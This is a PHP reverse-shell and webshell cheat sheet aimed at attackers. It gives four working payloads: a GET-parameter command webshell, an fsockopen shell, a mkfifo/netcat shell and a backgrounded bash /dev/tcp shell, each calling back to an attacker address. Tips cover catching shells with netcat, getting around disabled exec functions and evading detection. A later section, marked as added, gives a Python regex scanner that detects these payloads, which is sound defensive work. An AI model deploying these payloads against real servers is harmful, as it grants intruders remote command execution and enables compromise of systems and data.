This cheat sheet contains common PHP reverse shells and webshell snippets that work in different scenarios.


1. Basic Webshell Using system()

<?php system($_GET['cmd']); ?>
  • Usage: Execute commands by passing the cmd parameter in the URL.
  • Example: http://target.com/webshell.php?cmd=ls

2. PHP Reverse Shell Using One-liner with fsockopen()

php -r '$sock=fsockopen("10.9.50.114",3232);exec("/bin/sh -i <&3 >&3 2>&3");'
  • Run this on the target if you can execute PHP code directly.
  • Connects back to your listener on port 3232.

3. PHP Reverse Shell Using Named Pipe & Netcat

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.50.114 4242 >/tmp/f")?>
  • Uses a named pipe (/tmp/f) for a stable reverse shell.
  • Requires nc (Netcat) on the target machine.

4. PHP One-liner Bash Reverse Shell (Backgrounded)

<?PHP exec("nohup /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/9001 0>&1' > /dev/null 2>&1 &"); ?>
  • Runs a bash reverse shell in the background.
  • Useful for keeping the shell alive after the HTTP request ends.

🔥 Tips & Notes

  • Replace IP and ports with your attacker machine’s IP and desired port.
  • Use nc -lvnp <port> on your machine to catch the reverse shell.
  • Some functions, such as exec() and system(), might be disabled; test alternatives (passthru(), shell_exec(), popen()).
  • If nc is not installed on the target, try pure PHP or bash based shells.
  • Always check if the web server user has permissions to execute commands or create named pipes.
  • Combine these shells with Chankro or php-reverse-shell for better evasion.
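
On the defensive side, each of the four snippets above leaves a static indicator that can be matched in files under a web root. The scanner below is an added example, not part of the original cheat sheet; the rule names, the extension list and the sample inputs are constructed for illustration, and the rules are heuristics rather than a complete webshell detector.

```python
import os
import re

# Heuristic rules derived from the four snippets on this page. Rule names are
# made up for this example; treat hits as triage leads, not verdicts.
EXEC_FUNCS = r"\b(?:system|exec|passthru|shell_exec|popen|proc_open)"
RULES = [
    ("exec-of-request-input",   # snippet 1: exec function fed from the request
     re.compile(EXEC_FUNCS + r"\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("fsockopen-with-shell",    # snippet 2: outbound socket plus /bin/sh
     re.compile(r"\bfsockopen\s*\(.*?/bin/(?:ba)?sh\b", re.I | re.S)),
    ("named-pipe-netcat",       # snippet 3: mkfifo wired to nc
     re.compile(r"\bmkfifo\s+\S+.*?\bnc\b", re.I | re.S)),
    ("bash-dev-tcp",            # snippet 4: bash /dev/tcp redirection
     re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
]
PHP_EXTENSIONS = (".php", ".phtml", ".phar", ".inc")
# Constructed sample inputs (192.0.2.10 is a documentation-only address).
SAMPLES = {
    "upload.php": "<?php system($_GET['cmd']); ?>",
    "search.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "cron.php": "<?php exec(\"bash -c 'bash -i >& /dev/tcp/192.0.2.10/9001 0>&1'\"); ?>",
}


def scan_source(text):
    """Return the sorted names of all rules that match the given PHP source."""
    return sorted(name for name, rx in RULES if rx.search(text))


def scan_tree(root):
    """Walk a web root and return {path: [rule names]} for files with hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = scan_source(handle.read())
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name}: {scan_source(src) or 'clean'}")
```

Static matching misses obfuscated or encoded payloads, so pair it with file-integrity monitoring of the web root and alerting on shells spawned by the web server user.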